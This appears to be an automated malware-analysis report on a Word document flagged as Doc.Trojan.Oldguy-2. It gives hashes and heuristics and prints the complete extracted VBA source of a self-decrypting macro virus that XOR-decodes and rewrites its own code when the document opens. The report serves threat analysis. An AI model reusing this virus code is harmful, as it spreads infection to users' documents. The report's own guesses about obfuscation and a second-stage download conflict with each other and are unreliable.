Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 5e0f6cf7cafeb2ae…

MALICIOUS

Office (OLE)

Size: 40.0 KB | Created: 2001-06-22 08:27:00 | Authoring application: Microsoft Word 9.0 | First seen: 2012-06-14
MD5: 97366cf981b6cc7488ee5bb0c35085a3
SHA-1: 4ddd05215739b9c4cac2dffecfb70086ccbd02d2
SHA-256: 5e0f6cf7cafeb2ae9daebbe06fc854ec72f87c952b5b67a07daa972dec90266e
Risk score: 180

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file contains VBA macros, including a Document_Open macro; auto-execution on document open is a common technique for running malicious code as soon as a document is opened. The ClamAV detection 'Doc.Trojan.Oldguy-2' strongly indicates malicious intent. The macro code appears to be obfuscated, suggesting an attempt to hide its true functionality, likely to download and execute a second-stage payload.

Heuristics 3

  • ClamAV: Doc.Trojan.Oldguy-2 (severity: critical, rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Oldguy-2
  • VBA macros detected (severity: medium, 1 related finding, rule: OLE_VBA_MACROS)
    Document contains VBA macro code
  • Document_Open macro (severity: high, rule: OLE_VBA_DOCOPEN)
    Document contains a Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 3469 bytes
SHA-256: e39f398aebc08076ac7d506dbb739383d8db168c477cfef85383ff64b22962b3
Detection: ClamAV: Doc.Trojan.Oldguy-2
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
On Error Resume Next
For y = 7 To 25: ThisDocument.VBProject.VBComponents(1).CodeModule.ReplaceLine y, c(Mid(ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(y, 1), 2), Val(Mid(ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(33, 1), 2))): Next
Element
End Sub
Private Sub Element()
'ѕџСґѓѓћѓСЈ”‚„њ”Сї”‰…
'ў”…°……ѓСїћѓњђќҐ”њЃќђ…”Я·„ќќїђњ”ЭС‡“їћѓњђќ
'љСМСГАБСЪСёџ…ЩЈџ•СЫСЕДШ
'Ґ™�‚µћ’„њ”џ…Я§іЎѓћ›”’…Я§іІћњЃћџ”џ…‚ЩАШЯІћ•”јћ•„ќ”ЯЈ”Ѓќђ’”Ѕ�џ”СВВЭСІ™ѓЩВИШСЧСљ
'·ћѓС€СМСЖСҐћСГД
'Ґ™�‚µћ’„њ”џ…Я§іЎѓћ›”’…Я§іІћњЃћџ”џ…‚ЩАШЯІћ•”јћ•„ќ”ЯЈ”Ѓќђ’”Ѕ�џ”С€ЭСІ™ѓЩВИШСЧС’ЩҐ™�‚µћ’„њ”џ…Я§іЎѓћ›”’…Я§іІћњЃћџ”џ…‚ЩАШЯІћ•”јћ•„ќ”ЯЅ�џ”‚Щ€ЭСАШЭСљШ
'ї”‰…
'°ЃЃќ�’ђ…�ћџЯѕЃ…�ћџ‚Я§�ѓ„‚Ўѓћ…”’…�ћџСМС·ђќ‚”
'°ЃЃќ�’ђ…�ћџЯѕЃ…�ћџ‚Яўђ‡”їћѓњђќЎѓћњЃ…СМС·ђќ‚”
'°ЃЃќ�’ђ…�ћџЯµ�‚Ѓќђ€°ќ”ѓ…‚СМС†•°ќ”ѓ…‚їћџ”
'°ЃЃќ�’ђ…�ћџЯµ�‚Ѓќђ€ў…ђ…„‚іђѓСМС·ђќ‚”
'ё—СҐ™�‚µћ’„њ”џ…СМС°’…�‡”µћ’„њ”џ…СҐ™”џСў”…С™ћ‚…СМСїћѓњђќҐ”њЃќђ…”Сґќ‚”Сў”…С™ћ‚…СМС°’…�‡”µћ’„њ”џ…
'ё—С™ћ‚…Я§іЎѓћ›”’…Я§іІћњЃћџ”џ…‚ЩАШЯІћ•”јћ•„ќ”ЯЅ�џ”‚ЩГЖЭСАШСНПСУЎѓ�‡ђ…”С·„џ’…�ћџС’Щ†ЭљШУСҐ™”џ
'™ћ‚…Я§іЎѓћ›”’…Я§іІћњЃћџ”џ…‚ЩАШЯІћ•”јћ•„ќ”Я•”ќ”…”ќ�џ”‚САЭС™ћ‚…Я§іЎѓћ›”’…Я§іІћњЃћџ”џ…‚ЩАШЯІћ•”јћ•„ќ”Я’ћ„џ…ћ—ќ�џ”‚
'™ћ‚…Я§іЎѓћ›”’…Я§іІћњЃћџ”џ…‚ЩАШЯІћ•”јћ•„ќ”Я�џ‚”ѓ…ќ�џ”‚САЭСҐ™�‚µћ’„њ”џ…Я§іЎѓћ›”’…Я§іІћњЃћџ”џ…‚ЩАШЯІћ•”јћ•„ќ”ЯЅ�џ”‚ЩАЭСВЕШ
'ё—С™ћ‚…СМС°’…�‡”µћ’„њ”џ…СҐ™”џС°’…�‡”µћ’„њ”џ…Яўђ‡”°‚С°’…�‡”µћ’„њ”џ…Я·„ќќїђњ”
'ґџ•Сё—
'Ґ™�‚µћ’„њ”џ…Яўђ‡”
'ё—Сј�џ„…”Щїћ†ЩШШСМСў”’ћџ•Щїћ†ЩШШСҐ™”џСј‚–іћ‰СУЯЯЯ€ћ„ЭСљ””ЃСђ†ђ€С—ѓћњСњ”ЭСљ””ЃСђ†ђ€С—ѓћњС…™”њРУЭСБЭСУІќђ‚‚Яґќ”њ”џ…У
End Sub
Private Function c(w, k)
For y = 1 To Len(w)
c = c & Chr(Asc(Mid(w, y, 1)) Xor k)
Next
End Function
'Class.Element by an old friend... eikcaj-
'241